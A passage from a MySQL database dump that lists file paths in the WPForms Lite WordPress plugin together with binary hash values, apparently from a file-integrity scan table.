5ɟ','',0,'?'),('\\!O?;bp5a/','wp-content/plugins/wpforms-lite/assets/images/addon-icon-aweber.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$_[rU&','}<ùQ	O}5JmV׶¹S','',0,'?'),('dmG','wp-content/plugins/wpforms-lite/assets/images/addon-icon-campaign-monitor.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','< %H#0_,B','G히r\0=@\"Ē]bإkY','',0,'?'),('/ڄNW','wp-content/plugins/wpforms-lite/assets/images/addon-icon-captcha.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B&	0.r{4(','ہą3\'\\JI)U)-','',0,'?'),('WgRJu','wp-content/plugins/wpforms-lite/assets/images/addon-icon-conditional-logic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\nR֡sn\"','?wUl47S=6n4Hl(','',0,'?'),('ZgH,۵K:3=','wp-content/plugins/wpforms-lite/assets/images/addon-icon-constant-contact.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FG\"Eh]Q	',',)h\0Bϯw\ncɀ+O$Tq','',0,'?'),('bJX@47','wp-content/plugins/wpforms-lite/assets/images/addon-icon-conversational-forms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ggd_Dl4','K@>H4gi[TN#9Q','',0,'?'),('&Ցc9[','wp-content/plugins/wpforms-lite/assets/images/addon-icon-drip.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\08%@','OۉI{Z?!\'Zt@,t\\','',0,'?'),('V|x֫kX0H|','wp-content/plugins/wpforms-lite/assets/images/addon-icon-form-abandonment.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@8FT\rp9','um_.:_Ck`31','',0,'?'),('3\\%','wp-content/plugins/wpforms-lite/assets/images/addon-icon-form-pages.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^hO=Bs1J.+','i-jVh_V)nCbWǯ}F','',0,'?'),('\0Iek)}Y','wp-content/plugins/wpforms-lite/assets/images/addon-icon-form-templates-pack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!MD\0R','9rh_^^\\y}u{f\r5','',0,'?'),('Μ]YמWKwі','wp-content/plugins/wpforms-lite/assets/images/addon-icon-geolocation.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!N`hISU0','9\nB7.N*p5IA]\Z>','',0,'?'),('n.\0hm','wp-content/plugins/wpforms-lite/assets/images/addon-icon-getresponse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Bߤ=4-3hnn','崛w!}}@ۢC ]xu&','',0,'?'),('2qmȒeC+҃b','wp-content/plugins/wpforms-lite/assets/images/addon-icon-mailchimp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' P}LX','qVQFGLu䦺x>AQ3i','',0,'?'),('kd%\r,Gt1','wp-content/plugins/wpforms-lite/assets/images/addon-icon-offline-forms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fbYq5lCۍ','d0=[9skKL01ƠPm>Y_','',0,'?'),('B-dտ{U<=C','wp-content/plugins/wpforms-lite/assets/images/addon-icon-paypal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','91xIt-','>[8*S= Wh9\n','',0,'?'),('E%T;Ьs`>','wp-content/plugins/wpforms-lite/assets/images/addon-icon-post-submissions.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\"2#E!q','~IQ)b6!6\"ݺ?sّ','',0,'?'),('PƄPPhzFm','wp-content/plugins/wpforms-lite/assets/images/addon-icon-signatures.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1qdp&̎~','\"FCV:ؘR}SbbқΫ|','',0,'?'),('j fIS','wp-content/plugins/wpforms-lite/assets/images/addon-icon-stripe.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n25NY','۰R-sqdB.\0u37q','',0,'?'),('bu{VpAA[d','wp-content/plugins/wpforms-lite/assets/images/addon-icon-user-registration.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~!5@^$Х','LՖк[vNc\'\Zr緣:','',0,'?'),('N;ƍ\\6A','wp-content/plugins/wpforms-lite/assets/images/addon-icon-zapier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9*Oa; -1J3','\rƪli}>Dq[~=','',0,'?'),('VGwGqi','wp-content/plugins/wpforms-lite/assets/images/addon-icons-locker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/DӒQhkT','Ϗ.,xy\rzospC\"(a\r','',0,'?'),('>`gmi&V.','wp-content/plugins/wpforms-lite/assets/images/addon-icons-surveys-polls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UWo)2+No','RαtI]=o۫MuVț7\\Knf','',0,'?'),('4?{E Fg,sj','wp-content/plugins/wpforms-lite/assets/images/admin-flyout-menu/sullie-active.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ReFP`Bn','(1\"UBrukˑ$','',0,'?'),('pD͏V:p\0L','wp-content/plugins/wpforms-lite/assets/images/admin-flyout-menu/sullie-default.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G(WN	6/','\"6ZþRRԡ,HP','',0,'?'),('H9d޵`','wp-content/plugins/wpforms-lite/assets/images/analytics/screenshot-full.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B-yQtN6a٧','y=\07փ	r`F!ZEK P;O','',0,'?'),('bLigJÕTNK','wp-content/plugins/wpforms-lite/assets/images/analytics/screenshot-tnail.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qC:)lU/','_z5Zm}ngWL8wd\n71','',0,'?'),('s$z=c','wp-content/plugins/wpforms-lite/assets/images/analytics/wpforms-monsterinsights.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4XfSSz/B۠','6W1cBgIۍ\'dˢ?!,أ','',0,'?'),('rkup,g9','wp-content/plugins/wpforms-lite/assets/images/analytics/wpforms-monsterinsights@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rVh\"W\0c?','nJ){V>!@_->x<4v)r8!','',0,'?'),('WsQ5*PMpf텽','wp-content/plugins/wpforms-lite/assets/images/arrow-right.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q.gJ@]%','AybtS<UU\'1yg9e','',0,'?'),('\Z^	>pIʾ','wp-content/plugins/wpforms-lite/assets/images/builder-default-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\\2JK_!',')3^Ej>YŢ^1','',0,'?'),(')08fPF%','wp-content/plugins/wpforms-lite/assets/images/cc-about-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8U@WOi2Z\0.','4>6Iv0~EC1\0Ie?R','',0,'?'),('/','wp-content/plugins/wpforms-lite/assets/images/cc-about-step1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D3jK}:','n;pT揍6̗ҡŕ-\'#!','',0,'?'),('>гdVY\0F4','wp-content/plugins/wpforms-lite/assets/images/cc-about-step2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{|\'p0\r','T\nMC*ptyjtL[T','',0,'?'),('[1*p$gM','wp-content/plugins/wpforms-lite/assets/images/cc-about-step3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';	\ZMg&G','7R8ё\"54.bF/','',0,'?'),('w譈#>ULq','wp-content/plugins/wpforms-lite/assets/images/cc-about-step4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kqg74A','6Gxbp&w.','',0,'?'),('M4hױQ','wp-content/plugins/wpforms-lite/assets/images/challenge/getting-started.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QG*!H\\\n','^:7W\nf]3a\\Y>','',0,'?'),('S02^Q^g։','wp-content/plugins/wpforms-lite/assets/images/challenge/popup-congrats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v[2Jm8	}','䌒%DOr0$]ݹ^R G\r|','',0,'?'),('*o Jc5','wp-content/plugins/wpforms-lite/assets/images/challenge/popup-contact.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')]?c^\'tݶ','NhM=\",c32WPeMeg(w-=۫m','',0,'?'),('\'݃\'s`s','wp-content/plugins/wpforms-lite/assets/images/challenge/sullie-circle.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/}Jj;؊6&\0','o3cfz:g\\EM +CI','',0,'?'),('&̀zI|','wp-content/plugins/wpforms-lite/assets/images/check-solid.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\'N^/y','#ddD1]`\r\\w3[8Kp](','',0,'?'),('띖);)wPڈp','wp-content/plugins/wpforms-lite/assets/images/community/dev-docs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R.#S3\'`e@','\"HTm0ɣj=M~nu*w6d','',0,'?'),('FFfsl','wp-content/plugins/wpforms-lite/assets/images/community/dev-docs@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Iq8','(j=e-G[  ˼n|1O','',0,'?'),('I֜Hl','wp-content/plugins/wpforms-lite/assets/images/community/suggest.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>/D]','Z)5rƔnvp=& ','',0,'?'),('tkSIF	s؈','wp-content/plugins/wpforms-lite/assets/images/community/suggest@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')O0J)yjT',')UÓ6|LLY%','',0,'?'),('띄`7ޯ','wp-content/plugins/wpforms-lite/assets/images/community/translators.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rk[rgT)',';^N3VIQ		KvA;Z','',0,'?'),('tFiȑN&a','wp-content/plugins/wpforms-lite/assets/images/community/translators@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','՚ancD;L','EkY%`q4ah|O#AF<','',0,'?'),('ް8Bᙈ3t)I','wp-content/plugins/wpforms-lite/assets/images/community/vip-circle.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S&ݱ\'\\GA	pk','[,;{ܯ4n>% h񍅂֪;y','',0,'?'),('j>l7X','wp-content/plugins/wpforms-lite/assets/images/community/vip-circle@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=;Lue7','+6^Bi0wBɢt%B','',0,'?'),('/A3y)9','wp-content/plugins/wpforms-lite/assets/images/community/wpbeginner.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#ӎ\n֨dެ','u\nca#AEU\\Ӓ5*mR}','',0,'?'),('Uns/\r@Bg','wp-content/plugins/wpforms-lite/assets/images/community/wpbeginner@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S~elхΘzKPz','N9-$Agis.ťۈ0ľc','',0,'?'),('],ZfJ','wp-content/plugins/wpforms-lite/assets/images/cross-inverse.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5$','֔<%lW@>Xm4\\ G#','',0,'?'),('wJ(ĵ#','wp-content/plugins/wpforms-lite/assets/images/cross.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{a_v5lR','VJp:7<	ڙsWd7zRaB','',0,'?'),('bT)D5Ity#','wp-content/plugins/wpforms-lite/assets/images/exclamation-triangle.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DV@MO +8','Εܥ9HTd9|M+P','',0,'?'),('ti8㩨+*s','wp-content/plugins/wpforms-lite/assets/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u|6izSW<','HӈP=R;2[','',0,'?'),('x+?o@jkk=','wp-content/plugins/wpforms-lite/assets/images/icon-graph.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G2\rFv3Ve','JWjC7cƵ5yw41','',0,'?'),('B	Z.n.n\\','wp-content/plugins/wpforms-lite/assets/images/icon-provider-constant-contact.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FG\"Eh]Q	',',)h\0Bϯw\ncɀ+O$Tq','',0,'?'),(' u_kbL5z/cR','wp-content/plugins/wpforms-lite/assets/images/jquery.minicolors.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DO%I7s7','{u52UJ`\\`@oB>{lY \\','',0,'?'),('P\'Я(sUA	u~','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/pro-plus.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?NQ\0I\Z\n','\0y5Y/`7W$v>','',0,'?'),('x-IY`','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/screenshot-access-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҋm>~',')9k7G&MJ\0N','',0,'?'),('&b	#H','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/screenshot-access-controls@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j2^O9','}I3+[pVvWtx=','',0,'?'),('1\"T\0s','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/screenshot-members.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dr7Ts8V','Od/ЌI𶦉<gX','',0,'?'),('Cȏ7G&','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/screenshot-members@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S]3RU6','Ώ=+FSsSstZFta','',0,'?'),('dBwtRL0','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/screenshot-user-role-editor.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KJ,4x','o⑐\"!\\s˸q@s','',0,'?'),('VV\'3','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/screenshot-user-role-editor@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e3N?#w	','+Z\';*B\nʅvBjy0.[','',0,'?'),(']JxB,4 ','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/thumbnail-access-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F{*J5\\~&','Ὢ52OZ1xS%\0a','',0,'?'),('QKP7͏k^N','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/thumbnail-access-controls@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pɮ8wAP','	>m \\D&f5Y','',0,'?'),('mnN\0ުXge','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/thumbnail-members.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\nAwK\r]^','E S՜_ǝDL0','',0,'?'),('7@ؘXjmi','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/thumbnail-members@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','␛92|~8b','$DG$\ZwWT!CvU^Е','',0,'?'),('ݔ}!)\\NHN>','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/thumbnail-user-role-editor.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʑ$k)!h','H16FxAjx;x]J<','',0,'?'),('N;ҍ9yL','wp-content/plugins/wpforms-lite/assets/images/lite-settings-access/thumbnail-user-role-editor@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZcH{h9\Z','SiH\Z\"K{Mp:fDaC)ۑB','',0,'?'),(']iƝ]FJ1L','wp-content/plugins/wpforms-lite/assets/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~wgI\Z)sM\r\"','8A!uI\\`A;<|e?W`','',0,'?'),('hh<#~i@x','wp-content/plugins/wpforms-lite/assets/images/placeholder-200x125.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w;}:fke<3','?!o+|6-cUh7r90osu[:E','',0,'?'),('͏b:䙡;','wp-content/plugins/wpforms-lite/assets/images/recaptcha-placeholder.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\\HW|>','wplt%!B֙OP͊K','',0,'?'),('y`B+)','wp-content/plugins/wpforms-lite/assets/images/settings-captcha-addon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.h/Mӡَ','\ru[dϕTfu=`8B~:..#:\Z','',0,'?'),('1և	)0\r2q','wp-content/plugins/wpforms-lite/assets/images/settings-email-html.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iSJ#e1g$','Ĥ.&ppZ.;6q2{vЇ*','',0,'?'),('^;@|⎈ƃ8','wp-content/plugins/wpforms-lite/assets/images/settings-email-plaintext.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ʘ?QP*',',]r\\㧅g/nO0\\E|ӆM','',0,'?'),('90wԴu.Ix','wp-content/plugins/wpforms-lite/assets/images/smtp/screenshot-full.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lbk6','c\\ꮜIo}mWBƪٛ','',0,'?'),('Rlse%@nn','wp-content/plugins/wpforms-lite/assets/images/smtp/screenshot-tnail.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UI]v^W','k><ٹ*2Jo&','',0,'?'),('\r8ܭ+a)','wp-content/plugins/wpforms-lite/assets/images/smtp/wpforms-wpmailsmtp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vx*AѢz','6-{*lm&\".:*I {','',0,'?'),('el	;˅M裘q','wp-content/plugins/wpforms-lite/assets/images/smtp/wpforms-wpmailsmtp@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4|NE\rQFYM','4xÄwhX߶Uɜnb&1\Z','',0,'?'),('.H7-|]l#dH','wp-content/plugins/wpforms-lite/assets/images/step-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xsy5/y','\ra*K,H}aj]Om.D','',0,'?'),('*#g_YK,s','wp-content/plugins/wpforms-lite/assets/images/step-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G<S	)ӹ<','u|rB35rImi@@','',0,'?'),('g#z@Q\0','wp-content/plugins/wpforms-lite/assets/images/step-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZe.%чp',':F<,h\"`z ٕ¦','',0,'?'),('ԣo7','wp-content/plugins/wpforms-lite/assets/images/step-complete.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ja++]u',']k_[P]ۆހU','',0,'?'),('[|DHKD','wp-content/plugins/wpforms-lite/assets/images/submit-spin.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qa[{@c',' t}KqHe_#CW%r','',0,'?'),('20/19R\0\r5','wp-content/plugins/wpforms-lite/assets/images/sullie-alt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kx68Ahq','0T-kdP+/}c','',0,'?'),('RS!n','wp-content/plugins/wpforms-lite/assets/images/sullie-builder-mobile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǵ3cM','\\}@c3πuCKƾ7LPSoEެ4k','',0,'?'),('*<08~\rct','wp-content/plugins/wpforms-lite/assets/images/sullie-vc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vه\"m6g^','1օb*_XS[0U#2udR','',0,'?'),('!{N} ','wp-content/plugins/wpforms-lite/assets/images/sullie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')37?x','7jamlDLkgW[fa','',0,'?'),('5&<v?S	^','wp-content/plugins/wpforms-lite/assets/images/times-circle.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iV̘H',' =b4oqfE\0T!GR<GOTd','',0,'?'),('5Xx_c.]B','wp-content/plugins/wpforms-lite/assets/images/times-solid-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m#4v$^!','\"{#I#o!i*eb]ӓv','',0,'?'),(',Zx(GzH','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2cЏϻ@Q','hGԄ|~q=l1`','',0,'?'),('p_\'\Z1','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-10.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-}\rC	','PT7-7peYCdH:/Qfw/O','',0,'?'),('t߶>SF2wE','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2{}n*','Vbck>ð/S:()','',0,'?'),('3W\'EK','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#vMmns\0S','wfI1t\nL9ï`>,[','',0,'?'),('&;Ak^%','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/sED񗸊s+','#b?4	&g6q\0-Ђn/^','',0,'?'),('A:c!F߸[','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&db','&_!H|)59	S[G0OKYЛ','',0,'?'),('9\0<r>','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-6.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2IeTz','YWx{/Ir+澕Yk','',0,'?'),('md0qe\"[\"','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-7.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I3,m|?~','e|PQmk}ou','',0,'?'),('LHiL=D5+','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-8.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(㥷	e2','>Bgէݥ\rzhn;O','',0,'?'),('Od!Jq<<a ','wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-9.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۶d]T@!SOb','0\"iI;	?xy᭜','',0,'?'),('<6=ί,Ƭ[q.','wp-content/plugins/wpforms-lite/assets/images/welcome-testimonial-bill.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uŌ7S:{a','A7&H)>t,T\0ڣd','',0,'?'),('q4#s]j','wp-content/plugins/wpforms-lite/assets/images/welcome-testimonial-david.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߋΉ`vB','\ZZH<x2qtȯA}^_Z','',0,'?'),('x<LL\Z)m^q','wp-content/plugins/wpforms-lite/assets/images/welcome-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~LI*]Mtr\rb+\r','LJщ Z\rJKiSp),a	','',0,'?'),('.BoeKSK½O','wp-content/plugins/wpforms-lite/assets/images/zoom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4jQ','K$3	QqLKZݐ\\GAmo@\0','',0,'?'),('%0`GgI\Z\"','wp-content/plugins/wpforms-lite/assets/js/admin-builder-conditional-logic-core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Bqۖ0qtߧ','L2\rS?˜.rG*A}','',0,'?'),('RI\"\n','wp-content/plugins/wpforms-lite/assets/js/admin-builder-providers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}C-.-)hXEA','\0X0J!+4o#UFzO','',0,'?'),(' &$4Ui','wp-content/plugins/wpforms-lite/assets/js/admin-builder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZOޅ0 ','AGoOݕm#\'(#!','',0,'?'),('m4j','wp-content/plugins/wpforms-lite/assets/js/admin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}edN','Ǔ̷̥&pmbcO\r͜V','',0,'?'),('zLfά^%','wp-content/plugins/wpforms-lite/assets/js/admin-notifications.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oA@&=[Z!','4G(\'cbp\0h:(y&','',0,'?'),('7t֜','wp-content/plugins/wpforms-lite/assets/js/admin-notifications.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m+j\"9pnu^+','I&g	Ib\r̀Eϼk}jZvX','',0,'?'),('w>\Z~	','wp-content/plugins/wpforms-lite/assets/js/admin-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2q\r}1g','\'/yM\n\r[,a\Zh̪','',0,'?'),('9Z~߳+','wp-content/plugins/wpforms-lite/assets/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%8YGgh*J','%gf>Db{%\\Fgoӊ','',0,'?'),('L`V.8{n~ƀ','wp-content/plugins/wpforms-lite/assets/js/admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')&L\'k-^~x','\\ S>XK3=yBU}Sq','',0,'?'),('T^Pϼ','wp-content/plugins/wpforms-lite/assets/js/chart.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W˼r~','0K7v?~s,9sk<B=','',0,'?'),('LTdVslkM','wp-content/plugins/wpforms-lite/assets/js/choices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8LHqD(\"A*','5D\\6z?kɮR9ʳEb]','',0,'?'),('k%\\m/GCa,h','wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/providers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i!j	n>W|','xmV0nZx#e1جgPL','',0,'?'),('o|_4#nKW','wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/providers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jz@,:p','{K1r?\\d­.8Ci','',0,'?'),('ח\'-[f2S','wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/templates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bjAL\\6ގ','|3\0hA	_\0i r[?','',0,'?'),('(#=	\n\ZU','wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/templates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϔpEbJ4-=7','Z9`Օj?ͯ?P_@','',0,'?'),('U1hJD]s','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0O\\E	E΃n','l/|Hm@1TeC2vGG5&','',0,'?'),('bwCOw㝫-','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5/U0]',')B<hq(@\0X(X','',0,'?'),('l+<%w\"Vt','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-builder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W`\r,V0V','_ˏCs\r;YRN_U`m<X','',0,'?'),('z҄:L4R?YB]','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-builder.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' K𚀭bF?','5\\UmD-,L%E嬀E0=:.P>4','',0,'?'),('\\m o.r/','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s=q?D9J4@','BZBJWTh6i-*\'9=','',0,'?'),('FEaL\"0B','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`I\r6k=U_i','Wpe\0LM{ZϒsA','',0,'?'),('[]?(gѣ\\0t','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rc*_A/J','7pNa/0&\'Q_*\n','',0,'?'),('qmZGI\r','wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n-/=&|j6H','#:0wGÚ= S]j;8vN\n(G','',0,'?'),('ikRM\'\01','wp-content/plugins/wpforms-lite/assets/js/components/admin/gutenberg/formselector.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9x\0YZO^','Z/!v;4\nO\"{C1','',0,'?'),('7gNSt<6','wp-content/plugins/wpforms-lite/assets/js/components/admin/gutenberg/formselector.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Q65#D\np','\0-s%qVgu}XyN','',0,'?'),('l\"Gigb:','wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/analytics.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Smit</','C6̗\0N}scܚ